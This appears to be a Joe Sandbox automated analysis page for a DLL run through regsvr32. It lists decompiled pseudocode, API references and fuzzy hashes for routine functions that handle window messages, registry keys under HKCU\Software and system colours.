0x6da4d346
0x6da4d348
0x6da4d34b
0x6da4d353
0x6da4d34d
0x6da4d34d
0x6da4d34d
0x6da4d362
0x6da4d3e0
0x6da4d3e0
0x6da4d364
0x6da4d379
0x6da4d37e
0x6da4d381
0x00000000
0x6da4d383
0x6da4d384
0x6da4d38a
0x6da4d38c
0x6da4d391
0x6da4d39d
0x6da4d39d
0x6da4d3a4
0x6da4d3a8
0x6da4d3ab
0x6da4d3af
0x6da4d3b2
0x6da4d3b9
0x6da4d3bc
0x6da4d3c4
0x6da4d3be
0x6da4d3be
0x6da4d3be
0x6da4d3cb
0x6da4d3f0
0x6da4d3f7
0x6da4d400
0x6da4d408
0x6da4d415
0x6da4d418
0x6da4d41e
0x6da4d424
0x6da4d3d2
0x6da4d3d2
0x6da4d3d9
0x6da4d3de
0x6da4d3e8
0x6da4d3ed
0x00000000
0x00000000
0x00000000
0x00000000
0x6da4d3de
0x6da4d3cb
0x6da4d381
0x6da4d425
0x6da4d426
0x6da4d303
0x6da4d303
0x6da4d303
0x6da4d433

APIs

GlobalLock.KERNEL32 ref: 6DA4D30E
lstrlenA.KERNEL32(?), ref: 6DA4D359
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 6DA4D373
_wcslen.LIBCMT ref: 6DA4D397

Strings

System, xrefs: 6DA4D30A

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: a9505ec6f292f3c96b655141a5d0637039e0e9d205682b3922eb1d216f6fde08
Instruction ID: baa9e371780a69b21344367d65903d74e5887d65c94b16aa5f9ac1a34d265f5c
Opcode Fuzzy Hash: a9505ec6f292f3c96b655141a5d0637039e0e9d205682b3922eb1d216f6fde08
Instruction Fuzzy Hash: E5411872908219DFCF04CFA4C994AEEB7B4FF45300F14C629E512EB284D734A986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4017B Relevance: 10.6, APIs: 7, Instructions: 117
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E6DA4017B(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E6DA46A4C(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E6DA46E9B(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E6DA4367B(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E6DA46D9E(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E6DA46006();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E6DA4367B(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E6DA43579(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x6da4017b
0x6da4018f
0x6da40191
0x6da40194
0x6da40197
0x6da401a8
0x6da401a8
0x6da401ab
0x6da401ae
0x6da401b4
0x6da401b8
0x6da401bb
0x6da401c0
0x6da401c6
0x6da40236
0x6da40236
0x6da40239
0x00000000
0x00000000
0x6da4023b
0x6da4023b
0x6da4023b
0x6da40242
0x00000000
0x00000000
0x6da40247
0x6da4024c
0x6da40254
0x6da40261
0x6da40269
0x6da4026b
0x6da4026b
0x6da40254
0x6da40270
0x6da40272
0x6da40278
0x6da4027a
0x6da402b1
0x6da402b1
0x6da402b1
0x00000000
0x6da4027c
0x6da4027c
0x6da4027f
0x6da40284
0x6da40287
0x6da40289
0x6da40290
0x6da40290
0x6da402a2
0x6da40236
0x6da40236
0x6da40239
0x00000000
0x00000000
0x00000000
0x6da40239
0x6da40236
0x00000000
0x6da402a2
0x6da4027a
0x6da402a6
0x6da402a7
0x00000000
0x6da401cb
0x6da401d8
0x6da401da
0x00000000
0x6da401dc
0x6da401dc
0x6da401df
0x6da401e3
0x6da401e5
0x6da401ed
0x6da401ef
0x6da401ef
0x6da401f2
0x6da401f6
0x6da401f8
0x6da401fb
0x6da401fd
0x6da40200
0x6da4020e
0x6da4020e
0x6da40200
0x6da401fb
0x6da40214
0x6da40218
0x6da40233
0x6da40233
0x00000000
0x6da4021a
0x6da40226
0x6da4022c
0x6da4022f
0x6da40231
0x00000000
0x00000000
0x00000000
0x6da40231
0x6da40218
0x6da401da
0x6da40236
0x6da40199
0x6da4019e
0x6da401a1
0x6da401a6
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 6DA401AE
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 6DA401D2
UpdateWindow.USER32 ref: 6DA401ED
SendMessageA.USER32 ref: 6DA4020E
SendMessageA.USER32 ref: 6DA40226
UpdateWindow.USER32 ref: 6DA40269
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 6DA4029A

Part of subcall function 6DA43579: GetWindowLongA.USER32(CCCCCCCC,000000F0), ref: 6DA43584

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1dfb8a37fe6a79869755390eee2e2e71f6f87dacd41731cfc89e04b2dc8436d9
Instruction ID: 5cbbd7cde908f75997f0a0ef97a8d881a73a508e58f53f85a42a5e724d043ab7
Opcode Fuzzy Hash: 1dfb8a37fe6a79869755390eee2e2e71f6f87dacd41731cfc89e04b2dc8436d9
Instruction Fuzzy Hash: 9F41D334A0C706ABDF218F67C948EAFBBB4FF92705F14C02DE651A2190C7718680EB59

Uniqueness

Uniqueness Score: -1.00%

Function 6DA472E4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
registryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DA472E4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t82;
				void* _t83;
				intOrPtr _t91;

				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x124);
				E6DA5C876(E6DA6E4DC, __ebx, __edi, __esi);
				_t82 = __ecx;
				 *(_t83 - 0x120) = 0;
				 *(_t83 - 0x12c) = 0;
				_t36 = E6DA470E7(__ecx, __edx);
				 *(_t83 - 0x128) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t83 - 0x128;
						_push(_t65);
						_t68 = _t82;
						E6DA470F8();
						if(_t65 != 0) {
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t83 - 0x128) != 0);
				}
				if( *((intOrPtr*)(_t82 + 0x54)) != 0) {
					_t91 =  *((intOrPtr*)(_t82 + 0x68));
					_t92 = _t91 == 0;
					if(_t91 == 0) {
						E6DA44898(_t68);
					}
					E6DA3D380(_t92, "Software\\");
					 *((intOrPtr*)(_t83 - 4)) = 0;
					E6DA23240(_t67, _t83 - 0x11c, 0, _t82,  *((intOrPtr*)(_t82 + 0x54)));
					_push("\\");
					_push(_t83 - 0x11c);
					_push(_t83 - 0x130);
					_t46 = E6DA47111(_t67, 0, _t82, _t92);
					_push( *((intOrPtr*)(_t82 + 0x68)));
					 *((char*)(_t83 - 4)) = 1;
					_push(_t46);
					_push(_t83 - 0x124);
					E6DA47111(_t67, 0, _t82, _t92);
					 *((char*)(_t83 - 4)) = 3;
					E6DA21430( *((intOrPtr*)(_t83 - 0x130)) + 0xfffffff0);
					_push(_t83 - 0x124);
					_t82 = 0x80000001;
					_push(0x80000001);
					E6DA47166(_t67, 0, 0x80000001, _t92);
					if(RegOpenKeyA(0x80000001,  *(_t83 - 0x11c), _t83 - 0x120) == 0) {
						_t60 = RegEnumKeyA( *(_t83 - 0x120), 0, _t83 - 0x118, 0x104);
						_t94 = _t60 - 0x103;
						if(_t60 == 0x103) {
							_push(_t83 - 0x11c);
							_push(0x80000001);
							E6DA47166(_t67, 0, 0x80000001, _t94);
						}
						RegCloseKey( *(_t83 - 0x120));
					}
					RegQueryValueA(_t82,  *(_t83 - 0x124), _t83 - 0x118, _t83 - 0x12c);
					E6DA21430( &(( *(_t83 - 0x124))[0xfffffffffffffff0]));
					E6DA21430( &(( *(_t83 - 0x11c))[0xfffffffffffffff0]));
				}
				return E6DA5C8F9(_t67, 0, _t82);
			}

0x6da472e4
0x6da472e4
0x6da472e4
0x6da472ee
0x6da472f5
0x6da472f7
0x6da472fd
0x6da47303
0x6da47308
0x6da47310
0x6da47312
0x6da47312
0x6da47318
0x6da47319
0x6da4731b
0x6da47322
0x6da4732b
0x6da4732d
0x6da4732d
0x6da47330
0x6da47312
0x6da4733b
0x6da47343
0x6da47349
0x6da4734b
0x6da4734d
0x6da4734d
0x6da4735d
0x6da4736b
0x6da4736e
0x6da47373
0x6da4737e
0x6da47385
0x6da47386
0x6da4738b
0x6da4738e
0x6da47392
0x6da47399
0x6da4739a
0x6da473ab
0x6da473af
0x6da473ba
0x6da473bb
0x6da473c0
0x6da473c1
0x6da473dc
0x6da473f1
0x6da473f7
0x6da473fc
0x6da47404
0x6da47405
0x6da47406
0x6da47406
0x6da47411
0x6da47411
0x6da4742c
0x6da4743b
0x6da47449
0x6da47449
0x6da47456

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA472EE
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 6DA473D4
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6DA473F1
RegCloseKey.ADVAPI32(?), ref: 6DA47411
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 6DA4742C

Strings

Software\, xrefs: 6DA47352

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 23a58c2d891aa4a485bdb396b4a1734c9008b635c859bc70cb2ce6eb0b0e3973
Instruction ID: 91dd124639ec5a5fd70ce425dc475db21885a61e167008f4ae116b60dd45eda3
Opcode Fuzzy Hash: 23a58c2d891aa4a485bdb396b4a1734c9008b635c859bc70cb2ce6eb0b0e3973
Instruction Fuzzy Hash: 7C41AF31D081689BCF21DB64CD40EEEB7B8AF4A314F1586D5E259E2190DB349AD1CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA47166 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E6DA47166(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t38;
				void* _t51;
				void* _t54;
				signed int _t57;
				void* _t70;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t57 = __ebx;
				_push(0x124);
				E6DA5C8AC(E6DA6E493, __ebx, __edi, __esi);
				_t70 =  *(_t72 + 8);
				 *(_t72 - 0x12c) = _t70;
				E6DA213D0(_t72 - 0x124, _t75,  *((intOrPtr*)(_t72 + 0xc)));
				 *((intOrPtr*)(_t72 - 4)) = 0;
				if(_t70 == 0x80000000) {
					_t51 = E6DA49128();
					_t77 = _t51 - 1;
					if(_t51 == 1) {
						_t54 = E6DA22F70(_t77, _t72 - 0x120, "Software\\Classes\\", _t72 - 0x124);
						 *((char*)(_t72 - 4)) = 1;
						E6DA23100(__ebx, _t72 - 0x124, 0, _t70, _t77, _t54);
						 *((char*)(_t72 - 4)) = 0;
						E6DA21430( *((intOrPtr*)(_t72 - 0x120)) + 0xfffffff0);
						 *(_t72 - 0x12c) = 0x80000001;
					}
				}
				_t38 = RegOpenKeyA( *(_t72 - 0x12c),  *(_t72 - 0x124), _t72 - 0x128);
				_t71 = _t38;
				if(_t38 != 0) {
					L11:
					__eflags =  &(( *(_t72 - 0x124))[0xfffffffffffffff0]);
					E6DA21430( &(( *(_t72 - 0x124))[0xfffffffffffffff0]));
					return E6DA5C908(_t57, 0, _t71);
				} else {
					while(1) {
						_t71 = RegEnumKeyA( *(_t72 - 0x128), 0, _t72 - 0x11c, 0x104);
						_t80 = _t71;
						if(_t71 != 0) {
							break;
						}
						 *((char*)(_t72 - 4)) = 2;
						E6DA3D380(_t80, _t72 - 0x11c);
						 *((char*)(_t72 - 4)) = 3;
						_t71 = E6DA47166(_t57, 0, _t71, _t80,  *(_t72 - 0x128), _t72 - 0x120);
						_t57 = _t57 & 0xffffff00 | _t71 != 0x00000000;
						 *((char*)(_t72 - 4)) = 2;
						E6DA21430( *((intOrPtr*)(_t72 - 0x120)) + 0xfffffff0);
						if(_t57 != 0) {
							break;
						}
						 *((intOrPtr*)(_t72 - 4)) = 0;
					}
					__eflags = _t71 - 0x103;
					if(_t71 == 0x103) {
						L9:
						_t71 = RegDeleteKeyA( *(_t72 - 0x12c),  *(_t72 - 0x124));
						L10:
						RegCloseKey( *(_t72 - 0x128));
						goto L11;
					}
					__eflags = _t71 - 0x3f2;
					if(_t71 != 0x3f2) {
						goto L10;
					}
					goto L9;
				}
			}

0x6da47166
0x6da47166
0x6da47166
0x6da47170
0x6da47178
0x6da47182
0x6da47188
0x6da4718f
0x6da47198
0x6da4719a
0x6da4719f
0x6da471a2
0x6da471b7
0x6da471c6
0x6da471ca
0x6da471d8
0x6da471dc
0x6da471e1
0x6da471e1
0x6da471a2
0x6da471fe
0x6da47204
0x6da47208
0x6da472cc
0x6da472d2
0x6da472d5
0x6da472e1
0x6da4720e
0x6da4720e
0x6da47227
0x6da47229
0x6da4722b
0x00000000
0x00000000
0x6da4723a
0x6da4723e
0x6da47250
0x6da4725f
0x6da47263
0x6da47269
0x6da4726d
0x6da47274
0x00000000
0x00000000
0x6da47276
0x6da47276
0x6da4729c
0x6da472a2
0x6da472ac
0x6da472be
0x6da472c0
0x6da472c6
0x00000000
0x6da472c6
0x6da472a4
0x6da472aa
0x00000000
0x00000000
0x00000000
0x6da472aa

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6DA47170
RegOpenKeyA.ADVAPI32(?,?,?), ref: 6DA471FE
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6DA47221

Part of subcall function 6DA22F70: _DebugHeapAllocator.LIBCPMTD ref: 6DA22FA8
Part of subcall function 6DA22F70: _DebugHeapAllocator.LIBCPMTD ref: 6DA22FEA

Strings

Software\Classes\, xrefs: 6DA471B1

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocatorDebugHeap$EnumH_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 1692658365-1121929649
Opcode ID: 5c750153d6ada408de99d73866a33adf0e4e36d5268253a076b008ba9a916c58
Instruction ID: f1e6cc303e82994b48a6bc2ddd8a3af20a1bd6c9b87d85ac78e42c970f83c32b
Opcode Fuzzy Hash: 5c750153d6ada408de99d73866a33adf0e4e36d5268253a076b008ba9a916c58
Instruction Fuzzy Hash: 1B31B075C081689BCB22DB64CD04BEDB7B4AF0A314F1981D5EA99A3281C7315FE48F91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4C63F Relevance: 10.6, APIs: 7, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6DA4C63F(intOrPtr __ecx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HWND__* _t15;
				long _t16;
				struct HWND__* _t17;
				void* _t18;
				struct HWND__* _t19;

				_t24 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = __ecx;
				_t15 = GetCapture();
				while(1) {
					_v8 = _t15;
					if(_t15 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, 0);
					__eflags = _t16;
					if(__eflags == 0) {
						_t15 = E6DA419BB(0, _t24, 0x365, __eflags, _v8);
						continue;
					}
					L15:
					return _t16;
				}
				_t17 = GetFocus();
				while(1) {
					_v8 = _t17;
					if(_t17 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, 0);
					__eflags = _t16;
					if(__eflags == 0) {
						_t17 = E6DA419BB(0, _t24, 0x365, __eflags, _v8);
						continue;
					}
					goto L15;
				}
				_t25 = _v12;
				_t18 = E6DA41A05(_v12, 0x365);
				if(_t18 == 0) {
					_t18 = E6DA44898(_t25);
				}
				_t19 = GetLastActivePopup( *(_t18 + 0x20));
				while(1) {
					_v8 = _t19;
					_push(0);
					if(_t19 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, ??);
					__eflags = _t16;
					if(__eflags == 0) {
						_t19 = E6DA419BB(0, _t25, 0x365, __eflags, _v8);
						continue;
					}
					goto L15;
				}
				_t16 = SendMessageA( *(_v12 + 0x20), 0x111, 0xe147, ??);
				goto L15;
			}

0x6da4c63f
0x6da4c644
0x6da4c645
0x6da4c649
0x6da4c64c
0x6da4c675
0x6da4c675
0x6da4c67a
0x00000000
0x00000000
0x6da4c667
0x6da4c669
0x6da4c66b
0x6da4c670
0x00000000
0x6da4c670
0x6da4c6e8
0x6da4c6ec
0x6da4c6ec
0x6da4c67c
0x6da4c698
0x6da4c698
0x6da4c69d
0x00000000
0x00000000
0x6da4c68a
0x6da4c68c
0x6da4c68e
0x6da4c693
0x00000000
0x6da4c693
0x00000000
0x6da4c68e
0x6da4c69f
0x6da4c6a2
0x6da4c6a9
0x6da4c6ab
0x6da4c6ab
0x6da4c6b3
0x6da4c6ce
0x6da4c6ce
0x6da4c6d1
0x6da4c6d4
0x00000000
0x00000000
0x6da4c6c0
0x6da4c6c2
0x6da4c6c4
0x6da4c6c9
0x00000000
0x6da4c6c9
0x00000000
0x6da4c6c4
0x6da4c6e6
0x00000000

APIs

GetCapture.USER32 ref: 6DA4C64C
SendMessageA.USER32 ref: 6DA4C667
GetFocus.USER32 ref: 6DA4C67C
SendMessageA.USER32 ref: 6DA4C68A
GetLastActivePopup.USER32(?), ref: 6DA4C6B3
SendMessageA.USER32 ref: 6DA4C6C0

Part of subcall function 6DA419BB: GetWindowLongA.USER32(?,000000F0), ref: 6DA419E1
Part of subcall function 6DA419BB: GetParent.USER32(?), ref: 6DA419EF

SendMessageA.USER32 ref: 6DA4C6E6

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: c9a2133f6d53ffe92417ba6b6b435cf5b978e8804293ec82ad5fecd83addbe44
Instruction ID: 67221a0a709fb9f79e7f08d4689b7641247b1912005be37eb6d7fbef60e86bc7
Opcode Fuzzy Hash: c9a2133f6d53ffe92417ba6b6b435cf5b978e8804293ec82ad5fecd83addbe44
Instruction Fuzzy Hash: 3311B6B4A0D219FFDB015F61CE84C6EBE3DEF46359B11E476F105A2120D7318E85DA64

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4C4DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA4C4DB(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x6da4c4f8
0x6da4c4ff
0x6da4c502
0x6da4c505
0x6da4c508
0x6da4c513
0x6da4c54a
0x6da4c54a
0x6da4c555
0x6da4c55a
0x6da4c55a
0x6da4c55f
0x6da4c564
0x6da4c564
0x6da4c56d

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6DA4C50B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6DA4C52E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6DA4C54A
RegCloseKey.ADVAPI32(?), ref: 6DA4C55A
RegCloseKey.ADVAPI32(?), ref: 6DA4C564

Strings

software, xrefs: 6DA4C4F3

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 551f840c1a99d487ab52f27c423586950272ed3abe3d033f42090ead1e7ffc9d
Instruction ID: 7c7d144e487033cdeff1bb13f9688e69e5ae2b3f155599a0284621871ed65efe
Opcode Fuzzy Hash: 551f840c1a99d487ab52f27c423586950272ed3abe3d033f42090ead1e7ffc9d
Instruction Fuzzy Hash: 7D112876D00159BBCB21DB8ACC88DEFBFBCEFCA710B1040AAF504A2111D7719A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49E8B Relevance: 10.5, APIs: 7, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA49E8B(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x6da49e97
0x6da49e9d
0x6da49ea4
0x6da49eab
0x6da49eb2
0x6da49ebf
0x6da49ec6
0x6da49ec9
0x6da49ecc
0x6da49ed0

APIs

GetSysColor.USER32 ref: 6DA49E99
GetSysColor.USER32 ref: 6DA49EA0
GetSysColor.USER32 ref: 6DA49EA7
GetSysColor.USER32 ref: 6DA49EAE
GetSysColor.USER32 ref: 6DA49EB5
GetSysColorBrush.USER32 ref: 6DA49EC2
GetSysColorBrush.USER32 ref: 6DA49EC9

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: f80ac77508f805267b706e3dc9fa2e566ffd2eeb6695f0a1e89ba64ba1fca420
Instruction ID: ccde1205cced8d453b575b73d2aca33e03a3c5c6ac4f05663c10d8981aced6f4
